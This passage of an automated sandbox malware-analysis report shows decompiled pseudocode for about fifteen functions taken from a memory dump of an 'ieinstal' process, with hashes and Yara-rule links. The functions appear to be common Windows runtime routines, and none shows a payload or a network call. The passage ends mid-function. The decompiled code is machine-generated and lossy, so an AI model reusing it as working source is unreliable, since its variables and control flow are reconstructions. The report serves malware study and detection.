Opcode Fuzzy Hash: ca0abb894f7510a6b357e4a83ede505299fed7691ba1db346d194fdca9d1db46
Instruction Fuzzy Hash: DDF0E237604196EFC701DB56D810F4EFBAAEF80710F198052ED104B220D731B961D710

Uniqueness

Uniqueness Score: -1.00%

Function 1F094E03 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E1F094E03(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1f0bb370 ^ _t26;
				_v20 = __ecx;
				_v46 = 0x1c28;
				_v16 = __edx;
				if(E1EFD3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x1f094e03
0x1f094e12
0x1f094e1a
0x1f094e1d
0x1f094e21
0x1f094e2b
0x1f094e3d
0x1f094e2d
0x1f094e36
0x1f094e36
0x1f094e48
0x1f094e49
0x1f094e4b
0x1f094e50
0x1f094e61

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a519d0c6d29899b01b8593986b23a84e97af28c664a7f9318dc960fc0978cdac
Instruction ID: 0c94c42924d9df7d8df406897bc52beaea97a2ee4274b601d4e04f78fc05f9f8
Opcode Fuzzy Hash: a519d0c6d29899b01b8593986b23a84e97af28c664a7f9318dc960fc0978cdac
Instruction Fuzzy Hash: 3CF0B478A103089FD704EF74D501F6EB7F4BF04704F414469A510EB280EA34E9008714

Uniqueness

Uniqueness Score: -1.00%

Function 1F094E62 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E1F094E62(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1f0bb370 ^ _t26;
				_v20 = __ecx;
				_v46 = 0x1c27;
				_v16 = __edx;
				if(E1EFD3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x1f094e62
0x1f094e71
0x1f094e79
0x1f094e7c
0x1f094e80
0x1f094e8a
0x1f094e9c
0x1f094e8c
0x1f094e95
0x1f094e95
0x1f094ea7
0x1f094ea8
0x1f094eaa
0x1f094eaf
0x1f094ec0

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcad3f65d468fd3dab6f0c3b3f362b7094c7bdb82ea12d59a49de58db3a15dbb
Instruction ID: a59647f061188a3723946f6e979d2c69be61b2c2e21f891b43bc5e39c2ba3be4
Opcode Fuzzy Hash: dcad3f65d468fd3dab6f0c3b3f362b7094c7bdb82ea12d59a49de58db3a15dbb
Instruction Fuzzy Hash: 47F0BE78A10348AFDB04EFB8D551FAEB7F8BF04704F0184A9A900EB280EA34E900CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1F04DB2A Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1F04DB2A(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t14;
				void* _t15;
				intOrPtr _t19;
				void* _t26;
				void* _t28;
				void* _t31;

				_t31 = __eflags;
				_push(8);
				_push(0x1f09ce80);
				E1F017BE4(__ebx, __edi, __esi);
				_t26 = __ecx;
				E1F04D9C7(__ebx, __edi, __ecx, _t31);
				E1EFCFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				_t14 = _t26 + 8;
				_t19 =  *0x1f0b6a0c; // 0x0
				if( *((intOrPtr*)(_t19 + 4)) != 0x1f0b6a0c) {
					_t19 = 3;
					asm("int 0x29");
				}
				 *_t14 = _t19;
				 *((intOrPtr*)(_t14 + 4)) = 0x1f0b6a0c;
				 *((intOrPtr*)(_t19 + 4)) = _t14;
				 *0x1f0b6a0c = _t14;
				 *(_t28 - 4) = 0xfffffffe;
				_t15 = E1F04DB90();
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0x10));
				return _t15;
			}

0x1f04db2a
0x1f04db2a
0x1f04db2c
0x1f04db31
0x1f04db36
0x1f04db38
0x1f04db46
0x1f04db4b
0x1f04db4f
0x1f04db52
0x1f04db60
0x1f04db64
0x1f04db65
0x1f04db65
0x1f04db67
0x1f04db69
0x1f04db6c
0x1f04db6f
0x1f04db74
0x1f04db7b
0x1f04db83
0x1f04db8f

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe47dba3b3d86f2b064d8d11fd675c6b17b6021b149223a0573295e031d6d9ba
Instruction ID: a8aaef9632b10d31b6052d6305a94fdb7c705815c910eacf53eedbe4679d4f82
Opcode Fuzzy Hash: fe47dba3b3d86f2b064d8d11fd675c6b17b6021b149223a0573295e031d6d9ba
Instruction Fuzzy Hash: A0F049BAA01780DFCB14CF54D550B98B7B0EB44224F20C4ABC5069BA90DB36A901CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF9A48 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFF9A48(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t20 = __edi;
				_t18 = __ecx;
				_t17 = __ebx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					if(_a4 != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E1F094A6D(_t17, _t18, _t19, _t20, _t21);
					}
					return 0;
				}
				_t18 = __ecx + 0x30;
				if(E1EFD1BC4(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1ef913d0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x1eff9a48
0x1eff9a48
0x1eff9a48
0x1eff9a4e
0x1eff9a52
0x1f035f6d
0x1f035f71
0x1f035f82
0x1f035f82
0x00000000
0x1f035f87
0x1eff9a58
0x1eff9a62
0x00000000
0x1eff9a88
0x00000000
0x1eff9a8a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d70cf5612056adeb8dcce136ba08fdb1286febb5a8a6af8bc4640a4ac04365
Instruction ID: 8ecedc54b78e4cd327b8c2d3fb225538a7659fcf6bc609c6849dea9cf6ad4471
Opcode Fuzzy Hash: 28d70cf5612056adeb8dcce136ba08fdb1286febb5a8a6af8bc4640a4ac04365
Instruction Fuzzy Hash: CCF0E232E217969FD310C764C180B61B7D4BF80B71F0A8525E845CB922EB22F840C650

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBBE60 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1EFBBE60(intOrPtr _a4) {
				void* __ebp;
				signed int _t9;
				signed int _t10;
				void* _t13;
				intOrPtr _t17;
				void* _t18;
				void* _t19;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					return E1F094A6D(_t13, _t14, _t17, _t18, _t19);
				}
				_t9 =  *( *[fs:0x30] + 0xc);
				if( *((char*)(_t9 + 0x28)) == 0) {
					_t10 = _t17 + 4;
					_t14 =  *_t10;
					 *_t10 = 1;
					if( *_t10 != 0) {
						goto L3;
					}
					_t9 = _t10 | 0xffffffff;
					asm("lock xadd [edx], eax");
					if(_t9 == 0) {
						return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)),  *0x1f0b6644, _t17);
					}
				}
				return _t9;
			}

0x1efbbe68
0x1efbbe6d
0x1efbbe8e
0x00000000
0x1efbbe8e
0x1efbbe75
0x1efbbe7c
0x1efbbe80
0x1efbbe84
0x1efbbe84
0x1efbbe88
0x00000000
0x00000000
0x1f01d297
0x1f01d29a
0x1f01d29e
0x00000000
0x1f01d2b4
0x1f01d29e
0x1efbbe96

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b40ccbb395e7e5faff7757f9fdd025e088969b302514b3b91a3c329489cf10
Instruction ID: f049ee11997c0b88e9fc2e75b8ed28314afc807be5d4ea9e205ad64fd7e6c73b
Opcode Fuzzy Hash: 73b40ccbb395e7e5faff7757f9fdd025e088969b302514b3b91a3c329489cf10
Instruction Fuzzy Hash: E1F0E9361115468FC726CB15C970F15B765FB81730F1543A9D9658B5A1DB30D804C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 1F094FFF Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E1F094FFF(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1f0bb370 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2e;
				if(E1EFD3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x1f09500e
0x1f095016
0x1f095019
0x1f095024
0x1f095036
0x1f095026
0x1f09502f
0x1f09502f
0x1f095041
0x1f095042
0x1f095044
0x1f095049
0x1f09505a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dcf1c07b4514ba487e73d8002cba93ac8b72c500a0841c4ca0442b24aec2bca
Instruction ID: 90a3bc5ef5a3e14e0ad13901b2186dd72d92daa5cf6da153d0855dd8a20512a7
Opcode Fuzzy Hash: 5dcf1c07b4514ba487e73d8002cba93ac8b72c500a0841c4ca0442b24aec2bca
Instruction Fuzzy Hash: 41F082B4A00648AFDB04DBB9D955F9E77F8AF48744F5504A9F501EB280EA34E9018758

Uniqueness

Uniqueness Score: -1.00%

Function 1F094EC1 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E1F094EC1(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1f0bb370 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E1EFD3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x1f094ed0
0x1f094ed8
0x1f094edb
0x1f094ee6
0x1f094ef8
0x1f094ee8
0x1f094ef1
0x1f094ef1
0x1f094f03
0x1f094f04
0x1f094f06
0x1f094f0b
0x1f094f1c

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd9fe17fc17349cc862f1c336bf7e16269a1142cd28b3fd377c247e430c20c34
Instruction ID: 77a3ccce758a650eef3d9e7a7a75d1c66d9adfd2fb9c8e50ebd1959beec09299
Opcode Fuzzy Hash: bd9fe17fc17349cc862f1c336bf7e16269a1142cd28b3fd377c247e430c20c34
Instruction Fuzzy Hash: 5CF0E278A00248AFDB04DBB8D545E9E77F8AF08304F1104A9E511EB2C0EA34E9048714

Uniqueness

Uniqueness Score: -1.00%

Function 1F094D4B Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E1F094D4B(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1f0bb370 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E1EFD3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x1f094d5a
0x1f094d62
0x1f094d65
0x1f094d70
0x1f094d82
0x1f094d72
0x1f094d7b
0x1f094d7b
0x1f094d8d
0x1f094d8e
0x1f094d90
0x1f094d95
0x1f094da6

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93b9fc5af5da27c830fa7121204b95edebdc9354a5fbecd8b63d22aa366b22f3
Instruction ID: c929e4a7c2669b460985f9cac2aa1833128837faa1be492366fa428c6c8e052d
Opcode Fuzzy Hash: 93b9fc5af5da27c830fa7121204b95edebdc9354a5fbecd8b63d22aa366b22f3
Instruction Fuzzy Hash: E6F089B86112549FDB04EB74D515F6E77F8BF04704F050459B901DB3C0EA74E900C754

Uniqueness

Uniqueness Score: -1.00%

Function 1F094DA7 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E1F094DA7(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1f0bb370 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c25;
				if(E1EFD3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x20402);
				_push( *_t11 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x1f094db6
0x1f094dbe
0x1f094dc1
0x1f094dcc
0x1f094dde
0x1f094dce
0x1f094dd7
0x1f094dd7
0x1f094de9
0x1f094dea
0x1f094dec
0x1f094df1
0x1f094e02

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76502cae039b4584d0f760735ba6948dc95bc3c81d38755afdb0cb7225fe2e94
Instruction ID: a964673cb713eb85b2e207889368f9b0842d7da954dc67bd1b29b7fc1ef7e35c
Opcode Fuzzy Hash: 76502cae039b4584d0f760735ba6948dc95bc3c81d38755afdb0cb7225fe2e94
Instruction Fuzzy Hash: 5BF08278A11758AFDB04EBB8D915FAEB7F8BF04704F054469B905EB2C1EA74E900C758

Uniqueness

Uniqueness Score: -1.00%

Function 1F03CCF0 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1F03CCF0(intOrPtr _a4) {
				intOrPtr _v12;
				signed int _v16;
				void* _t15;
				signed int _t17;

				_v16 = _v16 & 0x00000000;
				_t12 = _a4;
				_push(0x18);
				_push((_t17 & 0xfffffff8) - 0x18);
				_push(0x20);
				_push(0xfffffffe);
				_v12 = _a4;
				_t15 = E1F002A60();
				if(_t15 >= 0) {
					E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t12);
				}
				return _t15;
			}

0x1f03ccfb
0x1f03cd05
0x1f03cd08
0x1f03cd0a
0x1f03cd0b
0x1f03cd0d
0x1f03cd0f
0x1f03cd18
0x1f03cd1c
0x1f03cd2b
0x1f03cd2b
0x1f03cd37

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
Instruction ID: 70023889d1d91893fc99482d4b7d05cae9f45f04c2ce36f541d3de568606fba0
Opcode Fuzzy Hash: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
Instruction Fuzzy Hash: 2EF0E53361065467C330AA198C05F5BBBACDBD5B70F14432AB9649B1D0DA70EA01C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC7C95 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFC7C95(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t20;

				_t17 = __ecx;
				_t20 = __ecx;
				if(E1EFD1BC4(__ecx, _t18) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1ef910a8 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					if(_a4 != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E1F094A6D(_t16, _t17, _t18, _t19, _t20);
					}
					return 0;
				} else {
					return 1;
				}
			}

0x1efc7c95
0x1efc7c9b
0x1efc7ca4
0x1f021826
0x1f021837
0x1f021837
0x00000000
0x1efc7cca
0x00000000
0x1efc7ccc

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc71d84122ef51eb20952e7201184d97a8aa2233a3f843db3f1320e8dcdc893
Instruction ID: 296641b99e0fe14bd34a42b0f7b8a96ddb9b2218ed94b9d92b4724ed10083a09
Opcode Fuzzy Hash: 7fc71d84122ef51eb20952e7201184d97a8aa2233a3f843db3f1320e8dcdc893
Instruction Fuzzy Hash: 51F0ED3A9202D59FD322C724C184F41B7D9EB00B70F9A86A6EC498B612D334F880C2A1

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB8DCD Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E1EFB8DCD(signed int __ecx) {
				signed int _t14;
				signed int _t17;

				_t14 = __ecx;
				_t17 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x24)) != 0) {
					_push(0);
					_push( *((intOrPtr*)(__ecx + 0x24)));
					E1F002A70();
				}
				if( *((intOrPtr*)(_t17 + 8)) != 0) {
					_push( *((intOrPtr*)(_t17 + 8)));
					E1F002A80();
				}
				asm("lock xadd [eax], ecx");
				if((_t14 | 0xffffffff) == 0) {
					E1EFB8C3D( *((intOrPtr*)(_t17 + 0x1c)));
				}
				return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t17);
			}

0x1efb8dcd
0x1efb8dd0
0x1efb8dd6
0x1f01b67e
0x1f01b680
0x1f01b683
0x1f01b683
0x1efb8de0
0x1f01b68d
0x1f01b690
0x1f01b690
0x1efb8dec
0x1efb8df0
0x1f01b69d
0x1f01b69d
0x1efb8e08

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
Instruction ID: b0ed090f62c0501819294dae7f85efdc1bb32eeefadef3376369dd8935ae44bc
Opcode Fuzzy Hash: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
Instruction Fuzzy Hash: C8F08C31115B80DFD731AF16DC20B02B7E0AF95620F054B2AE0560A8A0CB34F846CA44

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBEBC0 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E1EFBEBC0(intOrPtr _a4, char _a8, intOrPtr _a12) {
				void* __ecx;
				void* __ebp;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				intOrPtr _t20;

				_t15 = _a4;
				if(_t15 == 0) {
					L7:
					E1F094A6D(_t14, _t15, _t16, _t17, _t18);
					return 0xc000000d;
				}
				_t20 = _a12;
				if(_t20 < 0 || _t20 <= 0 && _a8 < 0) {
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
						goto L7;
					}
					_push(8);
					_push( &_a8);
					_push(2);
					_push( *((intOrPtr*)(_t15 + 0x24)));
					return E1F0043A0();
				} else {
					goto L7;
				}
			}

0x1efbebc6
0x1efbebcb
0x1efbebff
0x1efbebff
0x00000000
0x1efbec04
0x1efbebcd
0x1efbebd1
0x1efbebe8
0x00000000
0x00000000
0x1efbebea
0x1efbebef
0x1efbebf0
0x1efbebf2
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
Instruction ID: 23c3a89e9e2cf4433708f4d3615f48b3e539709b5d3f48205ba3f9abe4e6646c
Opcode Fuzzy Hash: e4006c1d87aeaf3b1e9d60ac6313c76d7ac9985f5ac1451b1c7dcc12017ca6ee
Instruction Fuzzy Hash: 52F0E53610428CAFEB14CF06C861F8537A5FB40724F01C21BFC0A8B041CB74E980DB95

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF8E15 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd64d9e9b42be41449e01673fa9a875fb832fd66592cf6ac08a71461d7a45f98
Instruction ID: 9a49c10ad924718ac4707c0c83f023435da92fc40e0533daf186cb217f3621bd
Opcode Fuzzy Hash: bd64d9e9b42be41449e01673fa9a875fb832fd66592cf6ac08a71461d7a45f98
Instruction Fuzzy Hash: 10E0923B3155F5CBCE024B6086B4399FB96AB41E60F450AD8DC48EF625C716C812EA64

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBBE18 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b50cc4f642d787da9f188e419348923fb3544b58f3fc9c3dd2eae02e739003
Instruction ID: 2006651f173362008ab7462fb6df5266ad040f3c43dbdaa83c741c8490aef91d
Opcode Fuzzy Hash: c0b50cc4f642d787da9f188e419348923fb3544b58f3fc9c3dd2eae02e739003
Instruction Fuzzy Hash: 32E0C232201941BFEB130BB6CC80E62FB6EFB842A0B240036F52482530CB22EC71F790

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFBD71 Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFFBD71(void* __eax, intOrPtr* __ecx, void* __edx) {
				intOrPtr* _t14;

				_t14 = __ecx;
				if(__ecx != 0) {
					_t12 =  *__ecx;
